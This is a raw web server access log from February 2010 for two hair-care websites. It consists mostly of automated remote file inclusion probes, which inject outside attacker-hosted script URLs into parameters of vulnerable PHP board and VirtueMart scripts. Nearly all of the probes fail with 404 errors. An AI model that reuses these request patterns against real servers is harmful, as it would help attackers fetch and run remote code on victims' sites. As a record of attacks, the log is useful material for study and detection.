89.107.104.80 - - [15/Feb/2010:00:56:43 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
89.107.104.80 - - [15/Feb/2010:00:56:44 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
151.8.79.19 - - [15/Feb/2010:00:56:47 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
151.8.79.19 - - [15/Feb/2010:00:56:47 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
151.8.79.19 - - [15/Feb/2010:00:56:47 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
151.8.79.19 - - [15/Feb/2010:00:56:57 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
151.8.79.19 - - [15/Feb/2010:00:56:57 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
151.8.79.19 - - [15/Feb/2010:00:57:00 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:00:57:18 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "growlonghairfast.com"
213.239.230.130 - - [15/Feb/2010:00:57:18 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "growlonghairfast.com"
62.140.23.24 - - [15/Feb/2010:00:58:27 -0800] "GET /bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.24 - - [15/Feb/2010:00:58:27 -0800] "GET /logs/access.log//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.24 - - [15/Feb/2010:00:58:27 -0800] "GET /logs//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.24 - - [15/Feb/2010:00:58:36 -0800] "GET /logs/access_100125.log//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:01:37 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:01:37 -0800] "GET /logs/access_091214.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:01:37 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.241.31 - - [15/Feb/2010:01:03:13 -0800] "GET //bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.241.31 - - [15/Feb/2010:01:03:13 -0800] "GET /logs///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.106.241.31 - - [15/Feb/2010:01:03:13 -0800] "GET /logs/access.log///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.72.64.119 - - [15/Feb/2010:01:05:18 -0800] "GET //bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.72.64.119 - - [15/Feb/2010:01:05:18 -0800] "GET /logs///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.72.64.119 - - [15/Feb/2010:01:05:18 -0800] "GET /logs/access.log///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.113.253 - - [15/Feb/2010:01:06:23 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.113.253 - - [15/Feb/2010:01:06:25 -0800] "GET /logs/access_090824.log HTTP/1.0" 200 817938 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:06:45 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:06:45 -0800] "GET /logs/access_091214.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:06:46 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:07:39 -0800] "GET /logs/access_091214.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:07:39 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:07:39 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.84.226 - - [15/Feb/2010:01:07:53 -0800] "GET //bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.84.226 - - [15/Feb/2010:01:07:53 -0800] "GET /logs///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.84.226 - - [15/Feb/2010:01:07:53 -0800] "GET /logs/access.log///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.194.248 - - [15/Feb/2010:01:09:27 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.194.248 - - [15/Feb/2010:01:09:27 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.194.248 - - [15/Feb/2010:01:09:27 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.194.248 - - [15/Feb/2010:01:09:37 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.194.248 - - [15/Feb/2010:01:09:37 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
219.94.194.248 - - [15/Feb/2010:01:09:38 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.2.240.202 - - [15/Feb/2010:01:10:00 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/9.00 (Windows NT 5.1; U; ru)" "growlonghairfast.com"
195.2.240.202 - - [15/Feb/2010:01:10:01 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/9.00 (Windows NT 5.1; U; ru)" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:11:34 -0800] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:11:34 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:11:34 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:13:41 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.70.79.113 - - [15/Feb/2010:01:13:41 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.70.79.113 - - [15/Feb/2010:01:13:41 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.63.198.74 - - [15/Feb/2010:01:14:07 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14053 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:14:29 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:14:29 -0800] "GET /logs/access_100104.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:14:29 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:15:09 -0800] "GET /logs/access_091228.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [15/Feb/2010:01:15:34 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [15/Feb/2010:01:15:34 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [15/Feb/2010:01:15:34 -0800] "GET /logs/access_100125.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:16:23 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:16:23 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:16:23 -0800] "GET /logs/access_100104.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.194.248 - - [15/Feb/2010:01:17:03 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.194.248 - - [15/Feb/2010:01:17:03 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.194.248 - - [15/Feb/2010:01:17:03 -0800] "GET /logs/access_100125.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.194.248 - - [15/Feb/2010:01:17:03 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.194.248 - - [15/Feb/2010:01:17:03 -0800] "GET /logs/access_100125.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.94.194.248 - - [15/Feb/2010:01:17:03 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:17:24 -0800] "GET /logs/access_091228.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:18:07 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:18:07 -0800] "GET /logs/access_100104.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:18:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:18:51 -0800] "GET /logs/access_091228.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [15/Feb/2010:01:19:48 -0800] "GET /logs/access_100125.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [15/Feb/2010:01:19:48 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [15/Feb/2010:01:19:48 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:21:16 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:21:16 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:21:17 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.107.104.80 - - [15/Feb/2010:01:21:24 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0" "freehairsecrets.com"
89.107.104.80 - - [15/Feb/2010:01:21:24 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0" "freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:21:31 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:21:31 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:21:31 -0800] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:21:47 -0800] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:21:48 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.150.99.144 - - [15/Feb/2010:01:21:48 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:22:21 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.70.79.113 - - [15/Feb/2010:01:22:21 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.70.79.113 - - [15/Feb/2010:01:22:21 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:23:50 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:23:50 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:23:51 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:23:53 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:23:54 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:23:54 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:23:57 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:23:57 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:23:57 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.217.216.132 - - [15/Feb/2010:01:25:10 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [15/Feb/2010:01:25:10 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [15/Feb/2010:01:25:10 -0800] "GET /logs/access_100125.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.241.177.123 - - [15/Feb/2010:01:25:23 -0800] "GET /logs/access_100125.log//board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.241.177.123 - - [15/Feb/2010:01:25:23 -0800] "GET /board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.241.177.123 - - [15/Feb/2010:01:25:23 -0800] "GET /logs//board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:25:34 -0800] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.70.79.113 - - [15/Feb/2010:01:25:34 -0800] "GET /logs/access_091228.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.2.240.202 - - [15/Feb/2010:01:25:54 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" "freehairsecrets.com"
195.2.240.202 - - [15/Feb/2010:01:25:54 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" "freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:26:01 -0800] "GET /logs/access_091207.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.70.79.113 - - [15/Feb/2010:01:26:44 -0800] "GET /logs/access_091207.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.70.79.113 - - [15/Feb/2010:01:28:17 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [15/Feb/2010:01:28:25 -0800] "GET /logs/access_091207.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.13.69.245 - - [15/Feb/2010:01:29:38 -0800] "GET /board.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.13.69.245 - - [15/Feb/2010:01:29:38 -0800] "GET /logs//board.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.13.69.245 - - [15/Feb/2010:01:29:38 -0800] "GET /logs/access.log//board.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.13.69.245 - - [15/Feb/2010:01:29:56 -0800] "GET /board.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.13.69.245 - - [15/Feb/2010:01:29:56 -0800] "GET /logs/access.log//board.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.13.69.245 - - [15/Feb/2010:01:29:56 -0800] "GET /logs//board.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.72.225.162 - - [15/Feb/2010:01:30:14 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "-" "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.freehairsecrets.com"
121.254.172.27 - - [15/Feb/2010:01:31:57 -0800] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
